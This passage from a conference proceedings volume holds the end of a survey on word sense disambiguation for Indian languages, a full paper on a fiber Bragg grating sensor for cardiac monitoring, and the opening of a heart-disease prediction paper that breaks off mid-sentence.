of the meaning of a word. This technique can be applied when there is no class
to be predicted, but the inputs can be divided into natural groups.
(b) Word Clustering: In this techniques, words are clustered together on the basis
of their features of semantic similarities. The similarity of these words can be
calculated from the sharing features between them. Extremely similar words in
a category have the same sort of characteristics. Then on applying the clustering
algorithm distinction between senses can be determined.
(c) Co-occurrence Graph: This method is based on the graph. In this method,
virtual graph on vector can be created after finding the polysemous word from
the result of sentence processing. These nodes helps to calculate the similarity.
Then, the consistent value can be determined based on the measurements, and
the mark can be assigned based on the context.

6 WSD Approaches in Context to WSD

After the detailed study of WSD approaches, we presented the summary of benefits
and drawbacks of different types of algorithms that are listed in Table 3.

7 Literature Analysis on Various WSD Methods


for Languages of India

Numerous works have been done for the implementation of disambiguation methods
for English to other European languages, but due to the lack of resources like machine
dictionaries, knowledge sources less work has been done in Indian languages. Such
resources are needed for WSD algorithms. The literature review of work carried out
in various Indian languages are presented here in a form of comparative analysis.
Table 4 contains the detailed analysis of several WSD algorithms applied in several
Indian languages, by various researchers, with reference to their result accuracy.

8 Conclusion

Due to the complexities of the words in the specific language and its dependence on
unorganized sources, disambiguation is a difficult task to capture the precise meaning
of a particular document. We have included a thorough analysis of the advantages and
disadvantages of different approaches to word sense disambiguation (WSD) in this
manuscript. We also discussed the different methods used by researchers in Indian
language machine translation research, as well as the accuracy of the findings. We
came to the conclusion that there are three methodologies: Regulated, unregulated,
708 A. S. Maurya and P. Bahadur

and information-based, with the controlled (supervised) approach providing the best
performance.
At last, we arrive at the determination that a specific system give significant degree
of precision for language, however, low for an extra, the elements of the pre-owned
informational collection influences the exhibition of the applied calculation, some of
these techniques are regularly run rapidly yet with imperatives of the exactness and
the vast majority of those strategies are executed for a few dialects effectively.
In our research work, we will apply supervised learning methods to disambiguate
the part-of-speech ambiguity in the source language, i.e., the English language during
machine translation from English to the Sanskrit language. We are focusing to trans-
late documents in source language, i.e., English into the target language, i.e., Sanskrit
with maximum success rate.

References

1. Bahadur, P., & Chauhan, D. S. (2014). Machine translation—A journey. In 2014 Science and
information conference (pp. 187–195). IEEE.
2. Dayal, V. (2004). The universal force of free choice any linguistic variation yearbook 4,
15–40. Retrieved from http//www.ingentaconnect.com; Cruse, D. (1986). Lexical semantics.
Introducing lexical relations. Cambridge: Cambridge University Press.
3. Cruse, D. (1986). Lexical semantics. Introducing lexical relations. Cambridge: Cambridge
University Press.
4. Zelta, E. N. (2014). Ambiguity. In Stanford encyclopedia of philosophy. Retrieved from http://
plato.stanford.edu; Navigli, R. (2009). Word sense disambiguation: A survey. ACM Computing
Surveys (CSUR), 10.
5. Navigli, R. (2009). Word sense disambiguation: A survey. ACM Computing Surveys (CSUR),
41(2), 1–69.
6. Lin, D., and Pantel, P. (2002). Discovering word senses from text. In ACM
7. Ranjan Pal, A., & Saha, D. (2015). Word sense disambiguation: A survey. International Journal
of Control Theory and Computer Modeling, 5(3), 1–16. https://doi.org/10.5121/ijctcm.2015.
5301
8. Haroon, R. P. (2011). Word sense disambiguation-A survey. In Proceedings of the international
colloquiums on computer electronics Electrical Mechanical and Civil, (EMC’ 11), ACEEE (pp
58–60). DOI: 02.CEMC.2011.01.582
9. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities. In Proceedings of SENSEVAL-
3, the third international workshop on the evaluation of systems for the semantic analysis of
text (pp. 187–190).
10. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In Proceedings of the 18th Pacific Asia conference on language, information and
computation (pp. 105–114).
11. Saktel, P., & Shrawankar, U. (2013). An improved approach for word ambiguity removal. arXiv
preprint arXiv:1304.7282.
12. Sheth, M., Popat, S., & Vyas, T. (2016). Word sense disambiguation for Indian languages. In
International conference on emerging research in computing, information, communication and
applications (pp. 583–593). Springer, Singapore.
13. Chaplot, D. S., & Salakhutdinov, R. (2018). Knowledge-based word sense disambiguation
using topic models. In Proceedings of the AAAI conference on artificial intelligence (Vol. 32,
No. 1).
A Detailed Analysis of Word Sense Disambiguation Algorithms … 709

14. Aliwy, A. H., & Taher, H. A. (2019). Word sense disambiguation: Survey study. Journal of
Computer Science. Accepted July 2019, Iraq.
15. Wang, Y., Wang, M., & Fujita, H. (2020). Word sense disambiguation: A comprehensive
knowledge exploitation framework. Knowledge-Based Systems, 190, 105030.
16. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107.
17. Gaudard, L., & Romerio, F. (2020). A conceptual framework to classify and manage risk,
uncertainty and ambiguity: An application to energy policy. Energies, 13(6), 1422.
18. Scarlini, B., Pasini, T., & Navigli, R. (2020). SensEmBERT: Context-enhanced sense embed-
dings for multilingual word sense disambiguation. In Proceedings of the AAAI conference on
artificial intelligence (Vol. 34, No. 05, pp. 8758–8765).
19. Scarlini, B., Pasini, T., & Navigli, R. (2020). With more contexts comes better performance:
Contextualized sense embeddings for all-round word sense disambiguation. In Proceedings
of the 2020 conference on Empirical Methods in Natural Language Processing (EMNLP)
(pp. 3528–3539).
20. Bahadur, P. (2013). English to Sanskrit machine translation-EtranS system. International
Journal of Computer Applications & Information Technology, 3(II) (ISSN: 2278–7720).
21. Banerjee, S., and Pedersen, T. (2002). An adapted Lesk algorithm for word sense disambigua-
tion using WordNet. In Proceedings of the third international conference on intelligent text
processing and computational linguistics, Mexico City, February.
22. Lesk, M. (1986). Automatic sense disambiguation using machine readable dictionaries: How
to tell a pine cone from an ice cream cone. In Proceedings of SIGDOC.
23. Jiang, J. J., & Conrath, D. W. (1997). Semantic similarity based on corpus statistics and lexical
taxonomy. In Proceedings of the 10th research on computational linguistics international
conference (pp. 19–33) 5–7 Aug, Taipei, Taiwan.
24. http://link.springer.com/article/10.1023/A%3A1002674829964#page-1
25. Parameswarappa, S., & Narayana, V. N. (2013). Kannada word sense disambiguation using
decision list. 2(3), 272–278
26. http://www.academia.edu/5135515/Decision_List_Algorithm_for_WSD_for_Telugu_NLP
27. Singh, R. L., Ghosh, K., Nongmeikapam, K., & Bandyopadhyay, S. (2014). A decision tree
based word sense disambiguation system in Manipuri language. Advanced Computing: An
International Journal (ACIJ), 5(4), 17–22.
28. http://wing.comp.nus.edu.sg/publications/theses/2011/low_wee_urop.pdf
29. http://www.d.umn.edu/~tpederse/Pubs/naacl01.pdf
30. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features. In PACLIC 18 (pp. 105–114), 8th–10th Dec 2004, Waseda University, Tokyo.
31. http://www.cs.upc.edu/~escudero/wsd/00-ecai.pdf
32. Aung, N. T. T., Soe, K. M., & Thein, N. L. (2011). A word sense disambiguation system
using Naïve Bayesian algorithm for Myanmar language. International Journal of Scientific &
Engineering Research, 2(9), 1–7.
33. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.13.9418&rep=rep1&type=pdf
34. http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.154.3476&rep=rep1&type=pdf
35. http://www.aclweb.org/anthology/W02-1606
36. http://www.cs.cmu.edu/~maheshj/pubs/joshi+pedersen+maclin.iicai2005.pdf date:
14/05/2015
37. Erkan, G., & Radev, D. (2004). Lexrank: graph based lexical. Artificial Intelligence Research,
22, 457–479.
38. Haroon, R. P. (2010). Malayalam word sense disambiguation. In 2010 IEEE international
conference on computational intelligence and computing research (pp. 1–4). IEEE.
39. Kumar, R., & Khanna, R. (2011). Natural language engineering: The study of word sense
disambiguation in Punjabi. Research Cell: An International Journal of Engineering Sciences,
1, 230–238. ISSN: 2229–6913.
710 A. S. Maurya and P. Bahadur

40. Das, A., & Sarkar, S. (2013). Word sense disambiguation in Bengali applied to Bengali-Hindi
machine translation. In Proceedings of the 10th International Conference on Natural Language
Processing (ICON), Noida, India.
41. Parameswarappa, S., Narayana, V. N., & Yarowsky, D. (2013). Kannada word sense disam-
biguation using decision list. International Journal of Emerging Trends & Technology in
Computer Science (IJETTCS), 2(3), 272–278.
42. Kumari, S., & Singh, P. (2013). Optimized word sense disambiguation in Hindi using genetic
algorithm. International Journal of Research in Computrer & Communication Technology,
2(7), 445–449.
43. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features. International Journal of Applied Engineering
Research, 9(20), 7609–7620.
44. Pal, A. R., Saha, D., Naskar, S., & Dash, N. S. (2015). Word sense disambiguation in Bengali:
A lemmatized system increases the accuracy of the result. In 2015 IEEE 2nd international
conference on recent trends in information systems (ReTIS) (pp. 342–346). IEEE.
45. Sankar, K. S., Raj, P. R., & Jayan, V. (2016). Unsupervised approach to word sense
disambiguation in Malayalam. Procedia Technology, 24, 1507–1513.
46. Vaishnav, Z. B. (2017). Gujarati word sense disambiguation using genetic algorithm. Inter-
national Journal on Recent and Innovation Trends in Computing and Communication, 5(6),
635–639.
47. Shashank, N. S., & Kallimani, J. S. (2017). Word sense disambiguation of polysemy
words in kannada language. In 2017 International Conference on Advances in Computing,
Communications and Informatics (ICACCI) (pp. 641–644). IEEE.
48. pal Singh, V., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language. Malaysian Journal of Computer Science, 31(3).
49. Borah, P. P., Talukdar, G., Baruah, A. (2019) WSD for assamese language. In J. Kalita, V. Balas,
S. Borah, & R. Pradhan (Eds.), Recent developments in machine learning and data analytics.
Advances in intelligent systems and computing (Vol. 740). Springer, Singapore. https://doi.org/
10.1007/978-981-13-1280-9_11
50. Vaishnav, Z. B., & Sajja, P. S. (2019). Knowledge-based approach for word sense disambigua-
tion using genetic algorithm for Gujarati. In Information and communication technology for
intelligent systems (pp. 485–494). Springer, Singapore.
51. pal Singh, V., & Kumar, P. (2020). Word sense disambiguation for Punjabi language using deep
learning techniques. Neural Computing and Applications, 32(8), 2963–2973.
Fiber Bragg Grating (FBG) Sensor
for the Monitoring of Cardiac
Parameters in Healthcare Facilities
Ambarish G. Mohapatra, Pradyumna Kumar Tripathy, Maitri Mohanty,
and Ashish Khanna

Abstract Fiber Bragg grating sensing technology provides a new look to the
healthcare monitoring system due to its spectral encoding capacity, dielectric prop-
erty, sensitivity, inert, nontoxic, resistive to the electromagnetic environment, self-
referencing, and low cost. This article presents a design and construction of an FBG
sensor for the monitoring of cardiac vibrations. A sensor element is designed by
depositing polydimethylsiloxane (PDMS) polymer on the FBG sensing element. The
elastic and thermal property of the sensor element is also discussed in this article.
The stress and strain distribution profile is addressed using finite element analysis
(FEA). Further, the bonding of the FBG sensor element is discussed in this article
with adequate design specifications. In addition to the FBG sensor design consid-
erations, the real-time acquisition of the cardiac signal is also experimented with in
this research work to validate the sensor performance. Finally, the architecture of a
cardiac monitoring approach by utilizing the Internet of things (IoT) and machine
learning (ML) is proposed in this article.

Keywords Fiber Bragg grating · Finite element analysis · Cardiac vibrations ·


PDMS · IoT · Machine learning

A. G. Mohapatra (B)
Department of Electronics and Instrumentation Engineering, Silicon Institute of Technology,
Bhubaneswar, Odisha, India
P. K. Tripathy
Department of Computer Science & Engineering, Silicon Institute of Technology, Bhubaneswar,
Odisha, India
M. Mohanty
SSC, Puri, Odisha, India
A. Khanna
Maharaja Agrasen Institute of Technology, Delhi, India
e-mail: ashishkhanna@mait.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 711
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_57
712 A. G. Mohapatra et al.

1 Introduction

Fiber optics communication is an uprising technology in the industrial telecommu-


nication sector, various remote healthcare application, and structural monitoring due
to its high performance, low cost, bandwidth, and reliable links. FBG is used as a
sensing element along with an optical sensor for various purposes such as biomedical
sensors, chemical sensors, and structural health monitoring. These sensors are used to
measure strain, temperature, vibration, acceleration, velocity, pressure, and humidity.
In a similar context, various research works have been reported till now on the devel-
opment of biomedical devices and systems using FBG sensors. Further, cardiac moni-
toring is one of the critical aspects in MRI environments where conventional sensors
are not permitted to be used in such situations. Therefore, the FBG sensor-based
cardiac parameter sensing is mostly suitable for these types of applications.
Evaluation of physiological parameters like heart rate, respiration rate, and ECG
is required during MRI in neonatal and in pediatric patients, handicapped persons,
persons with implanted artificial pacemakers, mental disorder persons, being in a
coma, administered anesthesia, or reaction to contrast medium. Commonly used
sensors and equipment cannot be used during MRI to measure respiration rate, heart
rate, and ECG due to the high electromagnetic field environment in MRI machine.
The above issues can be addressed by utilizing cutting-edge FBG sensors, polymer
engineering technology, the Internet of things, software engineering, big data, and
machine learning for the implementation of a complete healthcare solution.
This article is comprised of six different sections to portray the importance of such
systems in cardiac monitoring applications. The second section discusses the recent
advances of FBG sensing technology in various sensing applications, and the result-
based analysis of various research articles is also discussed in this review section.
Thirdly, the concept of the FBG sensing scheme is discussed with suitable mathe-
matical models and design considerations. Further, the results obtained during the
simulation of the proposed sensor element and design considerations are discussed
in the fourth section of this article. The final section of this article is the conclu-
sion section where the results obtained in the proposed methodology are discussed
followed by the reference section in the article.

2 Literature Review

A review on the development of FBG sensing technology for the monitoring of


cardiac and respiration parameters is presented in this section.
Koivistonen et al. present that polypropylene film-based two Emfi sensors of
size (30 cm×30 cm) have been used for capturing ballistocardiogram signals [1]. A
pair of Emfi sensors are placed at the backrest of the normal chair and in the seat.
The better signals are captured from under subjects than their behind. The signal
measured behind the subject’s back is fluctuated due to the moving of the chest
Fiber Bragg Grating (FBG) Sensor for the Monitoring … 713

during respiration. In a similar context, Dziuda et al. describe signals obtained from
FBG strain sensor which is made up of polymethyl is placed inside a bed mattress.
A moving average filter is used to obtain RR and HR [2]. The sensor signal is
affected due to the motion of the chest and also influenced by the body position,
cough, and displacement of the bed. FBG sensors are passive sensors suitable for
various critical applications [3]. The total error of the system is less than 8. Similarly,
Fajkus et al. describe a non-invasive probe based on two FBGs encapsulated inside
polydimethylsiloxane (PDMS) and observed polymer increases the sensitivity of the
probe four times. The wavelength-division technique is used on the spectral division
of individual grating to measure RR, HR, and body temperature [4]. The relative error
of the RR is 3.9%, and body temp is 0.36%. Dziuda et al. present FBG is written on
an optical fiber which is placed inside a pneumatic cushion. Fabry Perot filter is used
to analyzing FBG signals to detect HR and RR in sensing interrogation technology
[5]. FBG allows dynamic 24.8 µs strain breathing and approximately 8.3 µs for
HR. The sensor gives a maximum of 14% relative error. Dziuda et al. describe an
FBG sensor as placed inside a pneumatic cushion. Moving average method is used
to detect HR and RR on the filtering of the FBG signal by Fabry Perot and spectrally
scanning filter [6]. 0–12.4 µs is induced on FBG sensing element for breath rate
and 8.3 µs induced for HR. The maximum relative error for the sensor is 12%. Wo
et al. [7] present that a pair FBGs is inscribed in Er-doped fiber. Respiration rate is
measured on the variation of the beat signal between dual polarization of the packed
fiber laser. De Jonckheere presents an FBG-based smart textile elongation of 0.1–5%
during breathing. Spectroscopic technique with OSA is to detect HR and RR [8].
Wehrle presents an FBG strain sensor placed inside a belt and used a fixed filter with
OSA is to detect respiratory frequency spectrum and ventilator movement. Silva
describes a single FBG sensor is located inside a polymeric foil to detect RR and HR
[9]. Bilinear technique is used by using a two bandpass filter in the digital domain
[10]. Elsarnagawy describes the FBG sensor as embedded into Nylon textile. Two
bandpass filters in the range 0.1–0.4 Hz for RR and 0.8–1.6 Hz for HR [11]. Dziuda
et al. present an FBG sensor that adheres to the Plexiglas plate 95×220×1.5 mm
placed inside a bed mattress [12]. A cut-off frequency of 60 Hz is used by a low-pass
filter to detect RR and HR. The above review on FBG sensors concludes that there
is plenty of space at the bottom level, i.e., the development of high precision passive
sensor element.

3 Background

The FBG sensor element works on the principle of light traveling inside the core of the
optical fiber. The wavelength of light traveling inside the FBG element is attenuated
by the external strain and temperature on the grating region. The fabrication of the
FBG sensor element and basic working principles is discussed in this section.
714 A. G. Mohapatra et al.

3.1 The Fabrication Method of FBG

The fabrication of the FBG sensor element for the acquisition of cardiac vibrations
is performed by following an experimental procedure in the laboratory. Ultraviolet
ray is focused on an optical fiber to develop the grating in periodic structure in silica
fiber. It produces a periodic change of refractive index of photosensitive fibers of
optical fiber is called Bragg grating. Bragg grating is treated as a sensing element by
using multiplexing on several points along with the optical fiber during the designing
of a sensor. The type of grating depends on the photosensitivity mechanism on which
fringes are produced in the fiber. The working principle of FBG sensing devices is
discussed in the next section of the article.

3.1.1 Working Principle of the Sensor

Fiber Bragg grating sensor has introduced a modulated periodic refractive index
along the propagation axis of optical fiber [13, 14]. This periodic structure acts as
a highly wavelength selective reflection filter. When an intense laser light incidents
on a sensor, some amount of reflected light signals are combined to form a one
large reflection wavelength called Bragg wavelength, and the condition is called
Bragg condition as shown in Fig. 1 [15, 16]. The Bragg wavelength is represented
according to coupling theory as Eq. 1.

Fig. 1 Reflected wavelength of an FBG sensor


Fiber Bragg Grating (FBG) Sensor for the Monitoring … 715

λ B = 2ηeff  (1)

where
ηeff is the refractive index of the fiber core.
 is the grating period.
The reflected wavelength shift is dependent on both the strain and temperature
[17]. From the above equations, if the fiber Bragg grating material is chosen for the
design of the sensor, then strain sensitivity coefficient and temperature sensitivity
coefficient are used for sensing [7, 17].

4 Experiment and Result

The FEA model of the sensor element is designed in the COMSOL multiphysics soft-
ware, and the complete structural analysis is also performed. Simulation of various
designs involved in coupled physics, mechanics, acoustics, EM, fluid flow, heat
transfer, chemical reactions, etc., is carried out by using COMSOL multiphysics
software and preparation of easy apps.
The following analysis is performed using the COMSOL software.
• Single-physics and arbitrary multiphysics analyses.
• High-performance meshing and numerical analysis.
• Post-processing of the sensor structure.
The different analyses performed on the sensor element are shown in Figs. 2, 3, 4,
and 5. The 3D structure designed using the FEA software is shown in Fig. 2a. The size,
material, and other design considerations used in the FEA model are listed in Tables 1
and 2. Similarly, the 3D meshing of the FEA model is shown in Fig. 2b. Further, the

Fig. 2 3D model and 3D meshing of the polymer layer embedded on the FBG element
716 A. G. Mohapatra et al.

Fig. 3 Contour of total displacement and deformation profile along with force direction

Fig. 4 Contour of principal stress profile and fabricated sensor element

Fig. 5 LabVIEW graphical user interface (GUI) for real-time signal acquisition and acquired signal
Fiber Bragg Grating (FBG) Sensor for the Monitoring … 717

Table 1 Dimension of the


Parameters Dimension in mm
3D model
Length 40
Width 40
Thickness 2

Table 2 Design
Simulation configuration Parameter
configurations of the sensor
element Material Polydimethylsiloxane (PDMS)
Applied frequency 0.33 Hz
Acts/min 20 acts per minute

total deformation of the material layer is evaluated using the FEA simulation, and
the contour of the deformation profile is shown in Fig. 3a. Similarly, the contour of
the total deformation/displacement in the meter is shown in Fig. 3b.
It is clearly understood from the deformation profile as shown in Fig. 4a of the
PDMS layer that the deformation is maximum at the center region of the 3D element.
The FBG sensor element is bonded to the center region of the PDMS deposition
for obtaining maximum sensitivity. Figure 4b shows a snapshot of the fabricated
sensor element.
The signal recording from the fabricated sensor element is performed using the
developed software application in National Instruments LabVIEW platform. Initially,
an SLED optical light source is used, and the FBG interrogator is used to receive
the reflected wavelength. A LabView application is developed to estimate the peak
wavelength from the raw signal recorded from the FBG interrogator. Figure 5a shows
the GUI of the application software developed at the laboratory. Further, the fabricated
FBG sensor is tested using a similar procedure by fixing it on the chest position of
a test subject at the laboratory. The cardiac signal of the test subject is recorded
using the LabVIEW application. Figure 5b shows the real-time raw cardiac signal
recorded using the fabricated FBG sensor element. It is observed that the recorded
signal contains additional noise components, and the P, Q, S, T waves are largely
affected by the noise components; whereas, the R-wave is clearly visible, and it can
be further analyzed to estimate the useful cardiac parameters of a patient under test.

5 Conclusions

The finite element analysis method is used to formulate the design of a fiber Bragg
grating sensor for the real-time acquisition of cardiovascular parameters like heart
rate, respiration rate, oxygen concentration, and chest expansion. It is observed that
the PDMS polymer material is best suitable for the acquisition of the real-time
cardiac signal of the patient under medical examination. The individual responses
718 A. G. Mohapatra et al.

of the sensor element are evaluated successfully in the experimental study. The real-
time cardiac signal is also acquired using the fabricated FBG sensor element which
gives a clear picture of the R-wave of the cardiac signal pattern. The P, Q, S, and
T waves can also be estimated from the raw signal using robust signal processing
or machine learning techniques. The fabricated sensor element is can be used with
the Internet of things (IoT) platform for the monitoring of cardiac parameters of the
patient under MRI test.

Acknowledgements The authors thank the Silicon Institute of Technology, Bhubaneswar, and
Central Glass and Ceramic Research Institute (CGCRI), Kolkata to provide continuous support in
fabricating the FBG sensor during the research work. The authors also thank the Silicon Institute of
Technology, Bhubaneswar to provide license software like LabVIEW, COMSOL Multiphysics and
FBG interrogator to conduct this experiment successfully. We would like to acknowledge the finan-
cial support received under the research project grant scheme TEQIP-III Biju Patnaik University of
Technology (BPUT)Collaborative Research and Innovation Scheme (CRIS) vide Letter No. BPUT-
XIX-TEQIP-III/17/19/119 Dated: 08/11/2019. This work is a part of the Indian Patent filed vide
Ref. No. 202131001862 on/at Date/Time: 2021/01/14 22:58:13 (IST) under Intellectual Property
(IP) India.

References

1. Koivistoinen, T., Junnila, S., Varri, A., & Koobi, T. (2004). A new method for measuring the
ballistocardiogram using EMFi sensors in a normal chair. In The 26th Annual International
Conference of the IEEE Engineering in Medicine and Biology Society (pp. 2026–2029).
2. Dziuda, L., Krej, M., & Skibniewski, F. W. (2013). Fiber Bragg Grating sensor incorporated
to monitor patient vital signs during MRI. IEEE Sensor Journal, 13(12).
3. Paulo Carmo, J., & da Silva, A. M. F. (2012). Application of Fiber Bragg Gratings on wearable
garments. IEEE Sensor Journal, 12(12).
4. Fajkus, M., Nedoma, J., Martinek, R., Vasinek, V., Nazeran, H., & Siska, P. (2017). A non-
invasive multichannel hybrid fiber-optic sensor system for vital sign monitoring. MDPI Sensor.
5. Dziuda, L., Skinbiewski, F., Rozanowski, K., Krej, M., & Lewandowski, J. (2011). Fiber-optic
sensor for respiration and cardiac activity. IEEE.
6. Dziuda, L., Skibniewski, F. W., Krej, M., & Lewandowski, J. (2012). Monitoring respiration
and cardiac activity using Fiber Bragg Grating based sensor. IEEE Transactions on Biomedical
Engineering, 59(7).
7. Wo, J., Wang, H., Sun, Q., Shum, P. P., & Liu, D. (2014). Noninvasive respiration movement
sensor based on distributed Bragg reflector fiber laser with beat frequency interrogation. Journal
of Biomedical Optics, 19(1).
8. De jonckheere, J., Narbonneau, F., D’angelo, L. T., Witt, J., Paquet, B., Kinet, D., Kreber,
K., & Logier, R. (2010). FBG-based smart textiles for continuous monitoring of respiratory
movements for healthcare application. IEEE.
9. Silva, A. F., & Carmo, J. P., Mendes, P. M., & Correia, J. H. (2011). Simultaneous cardiac and
respiratory frequency measurement based on single fiber Bragg grating sensor. Measurement
Science and Technology.
10. Wehrle, G., Nohama, P., Kalinowski, H. J., Torres, P. I., & Valente, L.C.G. (2001). A fiber
optic Bragg grating sensor for monitoring ventilator movements. Measurement Science and
Technology 805–809.
11. Elsarnagawy, T. (2015). A simultaneous and validated FBG heartbeat and respiration rate
monitoring systems. Sensors Letters, 13, 1–4.
Fiber Bragg Grating (FBG) Sensor for the Monitoring … 719

12. Dziuda, L., Lewandowski, J., Skibniewski, F., & Nowicki, G. (2012). Fiber-optics sensor for
respiration and heart rate monitoring in the MRI environment.
13. Krej, M., Baran, P., & Dziuda, L. (2019). Detection of respiratory rate using a classifier of
waves in the signal from a FBG-based vital signs sensor. Elsevier.
14. De. Jonckheer, J., Jeanne, M., Grillet, A., Weber, S., Chaud, P., Logier, R., & Weber, J. L.
(2007). OFSETH: Optical fiber embedded into technical textile for healthcare, an efficient way
to monitor patient under magnetic resonance imaging. In Annual International Conference of
the IEEE Engineering in Medicine and Biology Society.
15. Gurkan, D., Starodubov, D., & Yuan, X. (2005). Monitoring of the heartbeat sounds using an
optical Fiber Bragg Grating sensor. IEEE.
16. Hao, J., Jayachandran, M., KNG, P. L., Foo, S. F., Aung, P. W. A., & Cai, Z. (2009). FBG-based
smart bed system for healthcare applications. Optoelectron China, 3(2), 78–83.
17. Mohapatra, A. G., Khanna, A., Gupta, D., Mohanty, M., & de Albuquerque, V. H. C. (2020).
An experimental approach to evaluate machine learning models for the estimation of load
distribution on suspension bridge using FBG sensors and IoT. Computational Intelligence.
Early-Stage Coronary Ailment
Prediction Using Dimensionality
Reduction and Data Mining Techniques

Krittika Dutta , Satish Chandra , and Mahendra Kumar Gourisaria

Abstract Cardiovascular diseases or heart-related diseases are one of the most


significant reasons for a huge number of mortalities in the world over the past few
decades and proved to be the most life-threatening disease. The person gets attacked
by this disease immediately that he hardly gets any chance for treatment. So, it is a
challenging task for doctors to diagnose the patients timely and correctly. So, there is
a requirement for an achievable, reliable and accurate method to detect such illness in
real time for genuine medications. The healthcare organization gathers a huge amount
of data related to heart disease, but unfortunately, they are not mined for discovering
the unseen pattern and potent decision making by doctors. The paper aims at devel-
oping cost-effective treatment and facilitating a database decision support system
by using various data mining techniques like the state-of-the-art approach artifi-
cial neural network (ANN), AdaBoost, decision tree, Passive Aggressive, logistic
regression, voting classifier, Naïve Bayes, K-Nearest Neighbors (KNN), support
vector (SVC) and random forest. Dimensionality reduction techniques like Principal
Component Analysis (PCA) and Linear Discriminant Analysis (LDA) have been
discussed for minimizing the number of attributes to increase the performance of the
machine learning algorithms. Artificial neural network was the best algorithm with
an accuracy of 88.52% with PCA and 85.24% with LDA dimensionality reduction
technique.

Keywords Health care · Heart disease prediction · PCA · Neural network ·


Ensemble methods · Decision tree · AdaBoost

1 Introduction

Data mining is the process of identifying the unseen order and tendency in the
database and using that vital information to construct predictive models. In the
healthcare industry, data mining has become very popular in detecting diseases [1].

K. Dutta · S. Chandra · M. K. Gourisaria (B)


School of Computer Engineering, KIIT Deemed To Be University, Bhubaneswar, Odisha 751024,
India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 721
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_58
722 K. Dutta et al.

Nowadays, healthcare organization collects a huge amount of data about disease


diagnosis, patients, electronic patients record, medical devices, hospital resources,
etc. These datasets are heterogeneous, widely dispersed, and huge in nature. One of
the major challenges of the healthcare industry is investigating patients accurately
and administering effective treatments at affordable costs [2]. So, data mining algo-
rithms can be used on these medical datasets for providing doctors an additional
source of information for effective decision making and to provide better service
quality to the patients [3].
One of the important organs of the human body is the heart which pumps blood
to every part of the anatomy. If the heart doesn’t function properly, the brain and
various other body parts stop functioning, and within a few minutes, the person will
pass away [4]. Due to the lifestyle change, bad food habits, and work-related stress,
the severity of heart-related diseases increases and thereby affecting the circulatory
systems [5]. Cardiovascular and cardiomyopathy disease are few categories of heart
diseases. Coronary heart disease causes due to the reduction of oxygen and blood
supply to the heart and results in chest pain, angina pectoris and heart attacks. There
are different forms of cardiovascular diseases like coronary artery disease, stroke,
valvular heart disease, high blood pressure, or rheumatic fever. There are some early
signs of the disease such as a dizzy spell, shortness of breath, discomfort following
meals, palpitation or fatigue [6].
According to World Health Organisation (WHO) survey, one in three adults have
high blood pressure which results in 31% of lives on the globe, i.e., 17.7 million
people are dying every year due to strokes and heart attacks [7]. Diagnosing heart
diseases is an important and complicated task that requires efficiency and accuracy.
According to the Global Burden of Disease Report of 2016, 1.7 million Indians have
died due to cardiovascular diseases. Heart-related illness reduces the proficiency
of a person and also enhances the expenditure on health care. According to the
estimation prepared by WHO, India has lost about $273 billion in wealth from 2005
to 2015, due to cardiovascular or heart-related disease [8]. Cardiovascular disease
also encompasses functional complications of the heart such as arrhythmias, irregular
heart rhythms or heart-valve abnormalities heart failure and many other problems. It
is a very important and complicated task to diagnose heart-related disease efficiently
and accurately [9].
The potential of medical professionals is limited and also, they are not avail-
able at certain places, which puts their patients at severe risk. This also leads to
undesired results and uncontrolled medical costs provided to patients [10]. There-
fore, an efficient and effective heart disease prediction systems can be advanta-
geous in the healthcare industry for heart disease prediction system by effective tests
and reduced medical tests [11]. The paper deals with automating the heart disease
prediction system, i.e., whether a person is having heart disease or not [12]. Various
pre-processing steps have been applied for studying the dataset and dimensionality
reduction techniques like PCA and LDA have been used to extract the minimum
number of features for the different classification algorithms used.
The rest of the paper has been organized into various sections as follows. Section 2
briefs about related works on cardiovascular disease prediction. In Sect. 3, we talk
Early-Stage Coronary Ailment Prediction Using Dimensionality … 723

about the methodology and materials which explain the data inspection and feature
extraction. Sections 3.1 and 3.2 describe the various algorithms implemented in the
paper. Section 4 comprises of results, scrutiny and comparison of models. Section 5
is all about the conclusion and future work.

2 Related Works

Rajkumar et al. (2010) did research for forecasting whether a person has a cardio-
vascular illness or not. They collected the dataset from the UCI repository having
303 instances and 13 attributes. They used KNN, decision list and Naïve Bayes
for the classification. They obtained that Naïve Bayes obtained 52.33% accuracy,
while decision list and KNN obtained 52% and 45.67% accuracy, respectively [13].
Kangwanariyakul et al. (2010), used different data mining neural network techniques
and support vector machine (SVM) to build automated technology for classifying
Ischemic Heart Disease (IHD) patients. They obtained the dataset by measuring the
cardiac magnetic fields at 36 locations (6 × 6 matrices) above the torso. They found
that Bayesian neural network (BNN) and Back-propagation neural network (BPNN)
was the best model with 78.43% accuracy, while SVM (RBF Kernel) obtained the
least accuracy of 60.78%. Sensitivity for BNN was highest at 96.55% while SVM
(RBF Kernel) has the least sensitivity of 41.38%. Both RBF kernel SVM and poly-
nomial kernel SVM displayed the maximum and minimum specificity of 86.36%
and 45.45%, respectively, [14].
Nayak et al. (2019) did a research on dataset taken from the UCI repository having
303 instances with 14 attributes including the target variable. They used various
machine learning algorithms like decision tree, SVM, Naïve Bayes and KNN. They
found that Naïve Bayes and SVM 88.67% and 81.13%, respectively, while KNN
has the least accuracy of 67.92% only [15]. Then, Mohan et al. (2019) put forward
a novel method, for increasing the accuracy of cardiovascular disease prediction,
